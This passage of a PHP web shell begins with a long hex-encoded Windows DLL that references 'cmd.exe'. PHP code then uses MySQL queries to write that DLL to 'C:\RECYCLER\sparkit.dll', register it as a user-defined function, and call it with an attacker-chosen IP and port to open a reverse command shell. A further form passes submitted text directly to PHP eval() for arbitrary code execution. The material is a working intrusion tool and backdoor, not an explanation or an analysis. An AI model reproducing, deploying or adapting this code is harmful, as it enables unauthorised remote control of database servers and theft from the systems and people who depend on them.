00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005858582829207265717569726573206120737472696E6720616E6420616E20696E74656765720000657869740A000000636D642E657865000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000700000001630793021319731E831F2310E3222322F323A3242326F329F32EB32393341334D3369337D3384338F339933D233D833DE33E433EA33F033F633FC330A341234183423343034383446344B345034553460346D3477348C3498349E34C034D2342E354A3557356435000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000)";
if(!mysql_query($query))
{
$err = mysql_error();
echo"<script> alert(\"$err\"); </script>";
}
$query = "select * into dumpfile 'C:\\RECYCLER\\sparkit.dll' from `local` where 1";
if(!mysql_query($query))
{
$err = mysql_error();
echo"<script> alert(\"$err\"); </script>";
}
$query = "create function myconnect returns integer soname 'sparkit.dll'";
if(!mysql_query($query))
{
$err = mysql_error();
echo"<script> alert(\"$err\"); </script>";
}
$query = "FLUSH LOGS";
if(!mysql_query($query))
{
$err = mysql_error();
echo"<script> alert(\"$err\"); </script>";
}
$query = "select myconnect('".$ip."', '".$port."')";
if(!mysql_query($query))
{
$err = mysql_error();
echo"<script> alert(\"$err\"); </script>";
}
}
exit;
}
if(isset($_GET['php']))
{
?>
<div id="eval">what about running some php code?
<form action="<?php echo $_SERVER['PHP_SELF']."?php=1"; ?>" method="post">
<textarea name="code" value="tz" " cols="100" rows="4"></textarea> <input type="submit" value="RUN" name="eval">
</form>
<?php
if($_REQUEST['eval'])
{
$code = stripslashes($_POST['code']);
eval($code);
}
exit;
}
?>
</div>
<?php
if(isset($_GET['upload']))
{
?>
<?php
exit;
}
?>
</body>
</html>
|